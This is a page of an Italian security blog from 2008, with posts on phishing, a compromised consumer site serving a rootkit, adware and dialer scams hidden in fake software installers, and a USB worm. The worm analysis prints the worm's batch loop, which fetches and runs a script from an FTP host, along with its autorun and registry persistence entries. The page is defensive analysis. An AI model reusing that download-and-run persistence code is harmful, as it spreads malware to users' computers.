• Pages

  • Home

• Categories

  • About Suspectfile
  • Lifestyle
  • Software
  • Uncategorized
  • Virus, Trojans & Worms
  • Web & Internet

• Recently Written

  • Task manager e registro di sistema out? E’ colpa di una backdoor.
  • Poste Italiane, ennesimo tentativo di phishing
  • La Symantec ha rilasciato due gioielli, Nav e NIS 2009
  • Compromesso il sito federconsumatori.it
  • Malware e business: quando tutto è previsto nella “licenza d’uso”.

• Archives

  • Novembre 2008
  • Settembre 2008
  • Agosto 2008
  • Luglio 2008
  • Aprile 2008
  • Marzo 2008
  • Febbraio 2008
  • Dicembre 2007
  • Novembre 2007
  • Ottobre 2007
  • Settembre 2007
  • Luglio 2007
  • Maggio 2007
  • Aprile 2007
  • Marzo 2007
  • Febbraio 2007
  • Gennaio 2007
  • Dicembre 2006
  • Novembre 2006
  • Settembre 2006

• Admin

  • Login
  • Wordpress

Internet Explorer che apre decine di pagine o pop-up, rallentamento durante la navigazione, sistema enormemente rallentato, task-manager e registro di configurazione del sistema che smettono di funzionare possono essere sintomi di infezione dovuta ad una Backdoor, PRINTDRV.EXE nella %sysdir% ne è la causa principale.

Prima dell’analisi dell’infezione vogliamo spendere due parole su uno dei siti che troviamo sempre presente durante l’apertura delle pagine, adultfriendfinder.com

Conosciuta come la comunità online che tratta contenuti sessuali più grande al mondo e con oltre 21 milioni di visite ogni mese,adultfriendfinder.com è uno dei 28 portali appartenenti alla Various Inc. società californiana acquisita nel 2007 dalla Penthouse Media Group Inc.

Read more…

Ci risiamo. Sembravano essere spariti i tentativi di phishing ai danni di Poste Italiane, ma l’altro giornoho dovuto ricredermi. Questa la mail ricevuta ieri 3/11/2008:

OGGETTO: Congratulazioni - Poste.it ti premia con un bonus…‏
MITTENTE: Poste.it (bonus03@bellsouth.net)
CORPO:

Read more…

Se prima era considerato come un prodotto per nulla “performante” e poco affidabile contro i malware ora, con questa nuova versione, l’azienda con sede a Cupertino ha voluto dare, sicuramente, un taglio con il recente passato.
Dopo il rilascio della prima beta pubblica, un lavoro durato diversi mesi che ha visto impegnate centinaia di persone, un forum pubblico dove chiunque poteva esprimere le proprie impressioni e suggerire eventuali miglioramenti, è stata lanciata sul mercato la release definitiva di Norton antivirus e Norton Internet Security versioni 2009.
Ho avuto modo di testare due pre-release (NIS2009) e, finalmente, quella finale tutt’ora installata che ti permette il suo utilizzo gratuito per 15 giorni. Beh, che dire? “Tanto di cappello” alla Symantec ed al suo team per l’ottimo lavoro fatto.
Veste grafica totalmente rivista, di facile comprensione per l’utente e totalmente configurabile.
Ma la prima impressione positiva l’ho avuta già durante l’installazione che è stata veloce e dove non ho riscontrato nessun problema, tanto per la cronaca vi scrivo che anche un’eventuale disinstallazione si risolve in pochissimi minuti.
Integra un modulo d’aggiornamento delle impronte virali totalmente nuovo con un controllo che avviene ogni 5/15 minuti ed in modo automatico.
Ottimo il motore di scansione, veloce e sicuro dà modo all’utente di rimuovere facilmente eventuali minacce trovate.
In Norton Protection System vengono raccolti quelli che possiamo definire il cuore della sicurezza offerta dal nuovo prodotto:
Browser Protection - contro attacchi complessi basati sul web
Tecnologia comportamentale SONAR - protegge da minacce non conosciute
IPS (Intrusion Prevention System) - protegge da attacchi multimediali
Protezione Antibot
ed infine uno strumento di recovery in caso di gravi infezioni dovute a malware

Due parole infine su quello che forse più interessa, l’affidabilità del prodotto.
Riguardo la durata della scansione che davvero è stata molto migliorata oserei dire dimezzata, quello che mi ha impressionato positivamente è l’alta percentuale di malware rilevato, migliorata del 25/30% rispetto l’ultimo test da me effettuato nell’ottobre dello scorso anno.
Che altro dire ah sì ancora una cosa, l’euristica. Ottima e con una tecnologia rispetto ad altri prodotti sicuramente più avanzata avendo di conseguenza un’incidenza praticamente nulla nei falsi positivi.
Leggevo nei giorni scorsi i test effettuati su un vasto campione di software (Av-Test.org - AV-Comparatives.org) e quello che mi ha colpito ma che avevo avuto già modo di verificare personalmente sono stati proprio gli elevati falsi avuti in software che comunque risultano nelle posizioni alte della graduatoria.
Personalmente la mia scelta cadrebbe sicuramente verso quel prodotto con magari un minor numero di rilevamenti ma che sia in grado di darmi certezze e non dubbi.

Infine una considerazione del tutto personale, un blog in fondo serve anche a questo ricordando e sottolineando che ne’ io, ne’ SuspectFile siamo collegati in maniera diretta od indiretta con alcuna azienda del settore.
Da anni non usavo, se non per test, prodotti Symantec visti gli scarsi risultati ottenuti. Lo scorso anno ero rimasto impressionato positivamente da Panda Security, con questa nuova release la Symantec mi ha fatto nuovamente innamorare di questo prodotto.
Se c’è un antivirus od una suite che oggi consiglierei è sicuramente quella di casa Symantec.

Ci è stato segnalato che il sito web federconsumatori.it, nato per la
salvaguardia dei diritti del consumatore, è stato compromesso da ignoti
al fine di installare Trojan.Mebroot, malware che utilizza tecniche
rootkit e capace di scrivere codice all’interno del Master Boot Record.

L’infezione avviene durante la prima visita nel sito di
federconsumatori.it e la redirezione è fatta mediante uno
codice Javascript presente nel sito, che si attiva
al click del mouse o al suo semplice spostamento.

La redirezione avviene verso i seguenti siti:
hxxp://g[RIMOSSO].com/cgi-bin/index.cgi?chlu
hxxp://d[RIMOSSO].com/cgi-bin/index.cgi?chlu

Il trojan viene installato mediante il kit di attacco Neosploit,
che utilizza diverse tecniche ed exploits per infettare i visitatori.

L’amministratore del sito web è stato allertato
e ora si attende la “bonifica” del sito.

Scaricare software da siti non ufficiali è diventata ormai pratica usuale e, se a questo aggiungiamo
l’irresponsabile indicizzazione di Google, come viene descritta nell’articolo di lufo88, scopriamo che infettarsi con programmi trovati all’interno di siti di dubbia affidabilità non è poi così un’eventualità del tutto remota.

Questo argomento è stato trattato decine di volte e lo si può leggere facilmente all’interno di siti o forum dove vengono spiegati soprattutto i passaggi per un corretto ripristino dei computer, poco o nulla viene spiegato del perché tutto ciò accada e cosa o chi si celi dietro tutto questo.

I danni causati da questi malware verranno descritti solo marginalmente, quello che mi è sembrato più interessante descrivere, appunto, è l’impressionante ragnatela che si tesse dietro questo che è, a tutti gli effetti, un vero e proprio business; scopriremo che gli artefici di tutto questo sono, ancora una volta vere e proprie organizzazioni anche se, ed è qui la sorpresa, tutto è previsto, spiegato nella licenza d’uso presente all’interno di ogni software e che quasi mai viene letta.

Ho preso in esame l’installer di messengerskinner, un programma per aggiungere emoticon a quelle già presenti in Live Messenger, lo stesso risultato lo si poteva ottenere con l’installer non ufficiale di eMule o quello altrettando falso di µTorrent ma anche di molti altri software scaricati da siti non ufficiali e presenti all’interno di siti fraudolenti creati per lo scopo.

Una volta eseguito il file d’installazione e selezionata la lingua

si può iniziare con la vera e propria installazione

a questo punto voglio soffermarmi su quello che è il primo riscontro, la licenza d’uso appunto.

Dall’immagine si può leggere che il sito da dove è stato scaricato il programma appartiene alla Favorit International, società con sede in Russia.

Continuando a leggere le condizioni d’uso nella parte Generale della licenza, al punto 1.1 vediamo che:
These conditions govern the use of the software and the content by the user as described herein and constitutes a license agreement between the provider and user who indicates that he/she understands and agrees to these conditions and consents to the downloading and the operation of the software on his/her computer.

Le condizioni presenti all’interno della licenza d’uso costituiscono un accordo fra fornitore ed utente dove quest’ultimo comprende ed accetta le suddette condizioni dando inoltre il consenso al download, affermando inoltre di conoscere il funzionamento del programma.

Per tutelarsi meglio (…) il fornitore inserisce nella licenza d’uso al punto 3.2
the software includes an ad-supported engine or component (“component”) necessary for the functioning of the software, and when the user runs it, the software itself will display on the user’s computer advertising messages or other information from the provider or third parties (with whom the provider has concluded relevant agreements) for the purposes of explaining the provider’s services and their correct use, or such other services, promotions and commercial offers that may interest the user.

con questo punto del contratto il fornitore avvisa l’utente della presenza di un motore per annunci pubblicitari, questo per permettere un corretto funzionamento del software ( ? ).

Quello che molto probabilmente gli utilizzatori di questi software non sanno è che, accettando le condizioni del contratto, esimono da ogni responsabilità il fornitore per ogni tipo di forma pubblicitaria essa avvenga durante l’utilizzo del software, ci sarebbe invece da discutere sulle mancate performance del computer, eventualità che invece la società fornitrice esclude.

User acknowledges that provider does not endorse the advertising messages or information/products shown by the software and, therefore, provider makes no warranty and/or representation regarding the advertising messages or information shown and does not accept liability thereof. The advertising messages and any other information will be easily identifiable and will not substantially interfere with other content viewed by the user and/or the performance of the user’s computer.

Ma questi software si comportano anche come spyware?
Certo, e viene anche menzionato al punto 3.3
In modo più o meno rassicurante l’utente viene avvertito che proprio per permettere l’invio di materiale pubblicitario menzionato al punto precedente (3.2), il programma trasmetterà ai server del provider dati quali:
Paese da cui avviene la connessione
Browser utilizzato
Tipo e versione del sistema operativo usato e Service Pack installato
Risoluzione dello schermo
Indirizzo IP
Software utilizzati durante la connessione

The data sent to the provider’s servers by the software will be limited to technical and connection information such as: country of connection, browser default country, operating system version, operating system or browser service packs installed, vertical and horizontal resolution of the monitor screen, ip address of the most recent internet connection and other relevant data or information which will be exclusively processed for the purpose of offering access to and proper use of the website as well as the proper performance and features of the software.

Com’era facile prevedere all’interno del contratto si afferma che
“In no case will the provider be able to identify the user nor will any profile of the user be created. ”

nessun tipo di informazione inviata al provider potrà mai identificare l’utente (…)

Altra parte molto interessante della licenza d’uso è “il componente” che viene aggiunto durante l’installazione, ecco cosa recita il contratto

When the user is connected to the internet, the component will make periodic connections to the provider’s servers in order to check that there are no problems in the access network or the user’s computer. If any error which prevents the normal use of the software is detected on the user’s computer, the component will seek to identify and solve it. Any changes that the component makes to the user’s computer will be to clearly non-essential parts thereof and for the purposes referred to in these conditions. The user requests and authorizes the installation and updating of this component together with the software in accordance with the terms set out in these conditions. The component will carry out the tasks described in these conditions only when the user is connected to the internet, whether using the software or the user’s regular internet connection.

Per componente si deve intendere quello che per le proprie caratteristiche si può e si deve considerare almeno come spyware, anche se per i compiti che svolge lo si può tranquillamente, senza forzature, paragonare più esattamente ad un trojan downloader.

Andiamo a vedere prima di tutto qual è il suo compito.

Nella licenza d’uso viene spiegato che in caso di problemi di funzionamento del software, questo componente effettuerà d’apprima una ricerca degli eventuali errori presenti nel computer dove esso risiede e, nel caso, provvederà a scaricare aggiornamenti o se necessario nuove versioni del software.

Il componente installato viene collocato in WindowsXP nella directory

C:\Documents and Settings\nome utente\Impostazioni locali\Dati applicazioni\

mentre la directory in Windows Vista sarà

C:\users\nome utente\appdata\local\

avremo dei file .dat .bat .exe come presenti in figura, i nomi saranno random ma sempre con le medesime caratteristiche
* = nome random –> il nome sarà identico per tutti i file

*.bat
*.dat
*.exe
*_nav.dat
*_navup.dat
*_navps.dat

valori verranno aggiunti nel registro di sistema

ricordo che i file aggiunti (.exe .bat .dat) possono essere rimossi semplicemente terminando dalla task manager (CTRL+ALT+CANC) il processo *.exe e disinstallando, successivamente, il programma “Favorit” da “Installazione Applicazioni”, il passaggio successivo sarà poi quello di rimuovere il programma che si era installato, nel nostro caso messengerskinner.

Veniamo ora alla parte più interessante, quella relativa all’organizzazione che c’è dietro questo business.
Oltre alle varie finestre pubblicitarie che ci vengono propinate, oltre agli indirizzi e-mail che vengono “catturati” con conseguente invio di spam e chissà cos’altro ancora (…), c’è la parte relativa al guadagno.
Torniamo quindi all’installazione del software.

Finità l’installazione e con connessione internet attiva viene aperta in automatico una finestra del browser si verrà indirizzati nel sito relativo il programma, nel nostro caso hxxp://www.messengerskinner.com/congtrat./[omesso] dove verremo avvisati che l’installazione del programma è andata a buon fine e dove verremo invitati a comporre da telefono fisso o cellulare un numero 899 a pagamento (2.40 euro al minuto iva compresa).

Dietro tutto questo, come già ho avuto modo di scrivere, ci sono ancora una volta società russe, nel nostro caso la Favorit International.

Vediamo allora come si ramifica questa società e da dove tutto ha origine.

L’hoster che ospita l’intera struttura è russo
MASTERHOST (masterhost.ru)
ora non ci resta che capire quale indirizzo IP o quale gruppo di indirizzi IP fanno capo alla “Favorit International”. Effettuando un semplice Whois possiamo stabilire che la società russa occupa un range IP che va dal 87.242.90.128 fino al 87.242.90.159
ecco quali siti possiamo trovare all’interno di questo gruppo IP

backstripgirls.com
blondeglamour.com
crazygirls-world.com
fp.pc-on-internet.com
gad-network.com
games-desktop.com
go-turf.com
gomusic.com
gomusic.net
gorecord.com
hot-tv.com
internet-media-download.com
internetgamebox.com
lastsoftwares.com
mailskinner.com
messengerskinner.com
navi-recherche.com
navi-search.com
navinetwork.com
official-emule.com
pc-on-internet.com
security-notifications.com
serialplayers.com
sudoplanet.com

come si può vedere nella lista è presente anche il “nostro” messengerskinner.com, ecco il grafico completo.
I siti sono stati registrati a nome di più persone ma tutte fanno capo alla stessa società.

E le aziende produttrici di antivirus?
Come si sono mosse per contrastare questo fenomeno che ricordo rasentare la legalità visto che nel contratto tutto comunue è previsto?

Alcune aziende, due o tre ad onor del vero, non curanti, per fortuna aggiungo io, di ciò che è previsto nelle licenze d’uso hanno deciso comunque di combattere questo che ripeto può, e deve, essere considerata un’azione ingannevole nei confronti degli utenti.
Poco importa se tutto è messo nero su bianco, ciò che dovrebbe essere salvaguardata sempre e comunque è la privacy e questo non avviene, anzi.
Altre aziende, le più, nulla hanno fatto o intendono fare. Perchè poi andarsi a creare problemi con possibili beghe giudiziarie?

E’ l’utente allora che deve avere la buona abitudine di leggersi chilometriche licenze d’uso e verificare che non siano presenti condizioni d’uso a lui per nulla favorevoli?
Sì, sembra proprio così. Però da oggi facciamolo con tutti i software che intendiamo installare… chissà che qualcuno non nasconda, a nostra insaputa, qualche scheletro all’interno del proprio… contratto.

Un interessante (sic!) articolo del corriere della sera parla di come proteggersi dalla raccolta di dati della nostra navigazione da parte di Google, illuminato (si spera) dittatore della rete.

Tra le varie opzioni si parla di Scookies, un estensione per Firefox. Cosa fa scookies secondo il giornalista? “Scookies cambia i cookie degli utenti mescolandoli gli uni agli altri. In questo modo vengono alterati i profili di ciascun utilizzatore intorbidendo il tracciato originale.” Quella che capisce una persona comune è che il risultato è positivo ma, il giornalista non spiega una cosa fondamentale: i cookie vengono scambiati e messi quindi a disposizione di perfetti sconosciuti, come riporta il sito stesso: “SCookies simply shares your cookies with other users that enabled it too.”.

Cosa si può fare un cookie l’ha dimostrato, in tempi recenti, Matteo Flora, con questa estensione si invierebbero i propri cookie a perfetti sconosciuti mettendo a repentaglio, per davvero, la nostra privacy.

Sul corriere dovrebbero contattare giornalisti più competenti, sull’articolo non c’è una sola riga che parli del rischio reale (non potenziale) di questo stratagemma. Scrivere un generico “Gli applicativi descritti non garantiscono una certezza riguardo la protezione della privacy” sembra più un modo per lavarsi le mani che un vero avviso.

Google indicizza nel bene e nel male ma, soprattutto nel male. Il sistema è, ovviamente, del tutto automatizzato e poco può fare se il sito che mette in cima alla “classifica” in realtà è fasullo per non dire pericoloso.

Succede così che si cerca il programma utorrent, che gestisce i file torrent, il primo sito che compare non è il sito originale ma un più enigmatico hxxp://www.utorrent.cc/it/ che propone il download del file. Mcaffe site advisor non segnala nulla (tranne un commento): http://www.siteadvisor.com/sites/utorrent.cc?ref=safe&client_ver=FF_26.6_6275&locale=it-IT&premium=false&client_type=FF&aff_id=0

Rassicurato sia dalla posizione (è il primo! Messo pure in evidenza!) e dal via libera di McAffe l’utente può scaricare il file ma, c’è una prima anomalia. Il file NON sembra lo stesso:
File scaricato:

File originale:

Tralasciando una rilevazione di AntiVir:

Confrontiamo un parametro per identificare meglio i files, cioè MD5.
File originale: 4ADD7DAE19AE850B29BF5F1B631BDA8A
File scaricato: 073A38D2AA5E2DF1668B71C0CD688248

Un poco diversi, quindi non sembrerebbe proprio lo stesso file ma, magari hanno solo cambiato la procedura di installazione. Il file scaricato una volta avviato fa comparire le schermate di installazione (che ricordano quelle italianeazel.com, di cui ho parlato tempo fa) e la licenza d’uso, che al paragrafo 1.1 riporta (in un italiano stentato):
“1.1. Attraverso il presente programa (qui di seguito chiamata “il programa”) gli utenti possono effettuare il download -dai nostri server al proprio hard disk- del file eseguibile che contiene il programma per computer selezionato (qui di seguito chiamato “il SOFTWARE”).

AVVISO PRELIMINARE: PER OGNI CHIAMATA DI SESSANTA SECONDI AL NUMERO 899022292, ALL’UTENTE DEL TELEFONO CELLULARE VERRÀ ADEBITATO UN IMPORTO DI SEIS E DIVIANNOVE EURO (IVA INCLUSA).”.
Al punto 3.4 inoltre:”3.4. Nel caso di una persona fisica, l’utente dichiara e garantisce a NETLINK NETWORK CORP. di essere maggiorenne.”

Qui si notano altre tre anomalie:
1. Perché in un software freeware come utorrent si parla di costi di chiamata telefonica?
2. Perché si deve dichiarare a “NETLINK NETWORK CORP.” di essere maggiorenni?
3. utorrent non appartiene a Bittorrent.inc?

A queste anomalie ecco la risposta! La successiva schermata (cliccare sul link) chiede di telefonare al 899022292 per ricevere un codice di installazione! Per il supporto si può anche visitare il sito hxxp://support.netlinkinvest.com. Inoltre viene contattato il sito
hxxp://utorrent.cc/it/check_code.php?CODE0= per testare il codice.

A me sembra speculare sulla pelle degli utenti poco accorti. Anche se non sembra esserci un malware tutto il sito è illegale. Non è però un caso isolato! Altri software famosi sono usati per svuotare in modo illecito i portafogli delle persone come CDburner xp (hxxp://www.cdburnerxpsoft.co).

Insomma, non c’è da stare allegri, Google dovrebbe controllare le proprie classifiche. Anche perché non sono casi isolati.

P.S. Per questi due software i siti originali sono:
http://www.utorrent.com/ per utorrent
http://cdburnerxp.se/ per cd burner xp

P.P.S. A volte il sito da me indicato non compare in cima ma, è comunque tra i link sponsorizzati.

E’ un Worm che si propaga attraverso i dispositivi removibili (pen, HD, lettori Mp3, ecc) in grado a sua volta di infettare quelli puliti. Lo scorso anno un simile malware rendeva inutilizzabili i dispositivi removibili; differenti gli eseguibili ed i valori aggiunti nel registro, ma uguale il risultato ottenuto. reper.exe questo il nome dell’eseguibile lanciato dall’autorun

[autorun]
open=reper.exe

ma anche

[autorun]
open=RavMon.exe

un altro esempio, vecchio di due anni, lo possiamo trovare spiegato all’interno del seguente link http://www.securityfocus.com/archive/88/437703/30/360/threaded
La tecnica dell’infezione non si discosta di molto da quella descritta in questo articolo e presente in questa variante del malware. Entriamo nei dettagli e capiamo come scoprire se il nostro computer è stato infettato. Crediamo inoltre che questo malware possa avere origini italiane:
una volta infettati possiamo avere un primo messaggio a video

cmd.exe - Disco non presente
Impossibile trovare il disco nell’unità. Inserire un disco nell’unità X
Annulla - Riprova - Continua

seguito da

Windows - Disco non presente
“Exception Processing message c0000013 parameters 75b1bf9c 4 75b1bf9c”
Annulla - Riprova - Continua

cliccando su uno qualsiasi dei tasti, la finestra si ripresenta.
Se si ricevono questi avvisi, basta controllare se è presente la cartella
%WinDir%\Installer\24ha12
se c’è, allora siete infetti. Avendo salvato copie di se stesso nei dispositivi removibili e nell’HD, a poco servirebbe ripulire solo uno di questi due; il worm è in grado di riprodursi e eseguirsi. Questo è uno dei file batch creati dal worm e che punta a ripristinare l’infezione nel sistema:

@shift
:begin
set winH=%systemroot%\Installer\24ha12
if exist %winH%\inet\stp exit
if exist %winH%\inet\intupdate\intupdate.bat del /b %winH%\inet\intupdate\intupdate.bat
ftp -v -i -s:”%winH%\inet\int2com.txt” ftp.digiland.it
if not exist %winH%\inet\slp2.exe copy %myfiles%\sleep.exe, %winH%\inet\slp2.exe
start /b /wait %winH%\inet\slp2.exe 900
if exist %winH%\inet\intupdate\intupdate.bat call %winH%\inet\intupdate\intupdate.bat
goto begin

questo è il contenuto dell’autorun.inf:

action= Apri cartella per visualizzare i file
shell\Auto\command=hvNrtID.exe
shell=Auto

dove la directory
%myfiles% è %UserProfile%\Impostazioni locali\Data applicazioni
e i files hvNrtID.exe e autorun.inf si trovano sia nelle unità removibili infette che nell’HD. Per poter essere eseguito all’avvio aggiunge i seguenti valori
N_prog=%SysDir%\N_prog.exe
str_insDr=%WinDir%\Installer\24ha12\Ic2d\str_insDr.exe
in

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Per rimuoverlo è stato creato da SuspectFile un fix_tool. Il tool è prelevabile all’interno del nostro forum nella sezione “Tools” visitando questa discussione: http://www.suspectfile.com/forum/viewtopic.php?f=8&t=2544

Deifobe & amvinfe

Steve Jobs ammette che il nuovissimo ed (in)utilissimo iPhone traccia e spia i propri utilizzatori. Scatta subito la, giusta, ira dei consumatori di cui Adusbef e Federconsumatori fanno da condottieri.

Pesanti accuse insomma, che fanno dalla violazione della privacy all’uso di malware (dov’era scritto nella licenza d’uso che c’era questa monitoraggio?). Mondo dell’informatica sconvolto? Macché! Basta cercare sul sito di Paolo Attivissimo, dove è presente un articolo dell’8 Luglio che parla dell’implementazione del Trusted Computing sull’iPhone.

Il Trusted Computing, in parole povere, è una serie di congegni (hardware e software) che si comportano come dei guardiani, cioè consentono l’uso di software/hardware preventivamente autorizzato. Detto così sembra anche qualcosa di positivo ma, l’autorizzazione non la crea l’utente ma, solo i big del mondo dell’informatica. Tralasciando le varie implicazioni (fine dei software freeware) significa limitare pesantemente l’uso di qualsiasi apparecchio elettronico. Tuttavia, ha anche altre funzioni. Altro possibile scopo è il monitoraggio continuo del computer dell’utente per escludere eventuali manomissioni .

Nel nostro caso si è mostrato in tutta la sua “potenza”. Oltre a limitare l’uso del prodotto, spia anche i singoli utenti per assicurare che non vi siano alterazioni del chip che gestisce il sistema.

Insomma, chi era un poco informato avrebbe fiutato la minaccia ben prima delle ammissioni di Jobs. Questo fa anche riflettere sul fatto che questi apparecchi non vengono minimamente controllati sotto l’aspetto della privacy né tanto meno usati da persone competenti prima dell’immissione sul mercato.

Positivo invece che il tutto non sia rimasto in sordina, anche se da anni si denunciano i rischi inerenti al TC.

P.S. L’articolo è dello stesso autore che l’ha pubblicato Su Open world blog.

A volte, le case antivirus risultano un po’ troppo zelanti e poco accorte allo stesso tempo nel catalogare i file come infetti.

Malware, infatti, è un software creato “con il solo scopo di causare danni” (definizione tratta da wikipedia) e installato contro la volontà dell’utente. Questo vuol dire che un eventuale programma di “pop-up” regolarmente segnalato tramite la licenza d’uso (che non si legge mai) all’interno di un qualsiasi software non è proprio malware, perché, a differenza di altre minacce, si acconsente all’installazione dello stesso.

Questo il caso di MP3 CD extractor, un programma per l’estrazione delle tracce audio, rilevato come infetto da 10 antivirus. Le identificazioni parlano di trojan downloader e backdoor. Minacce pesanti per la sicurezza del nostro computer ma, la cosa non è proprio così.

Nel sito, che non scrivo per evitare pubblicità, viene detto che il programma è freeware e si invita la lettura della licenza per eventuali informazioni. Nella licenza c’è un paragrafo intero che come titolo ha:
5. Display of electronic advertisements
[…]you agree that the
Software may display advertisements on your computer and send some
information, such as the URLs you visit or the text on the page to
show contextual or not contextual advertisement without any compensation to
you.[…]

Uomo avvisato…. uomo avvisato!

Nessun malware ma, un ad-ware, palesemente dichiarato, che non giustifica certo le rilevazioni delle aziende.
Ma, una cosa stona: è la dichiarazione dei proprietari del sito che assicurano l’assenza di spyware e ad-ware. L’ad-ware c’è però (legale o meno) e minaccia la privacy. Una correzione in “potenzialmente pericoloso” da parte delle varie aziende sarebbe più che doverosa. nei confronti degli utenti in primis.

Next posts »

Do you want to help SuspectFile?

Comments or questions? E-mail: info@suspectfile.com © 2006

From 24-01-2006 this site has been visited 84410 times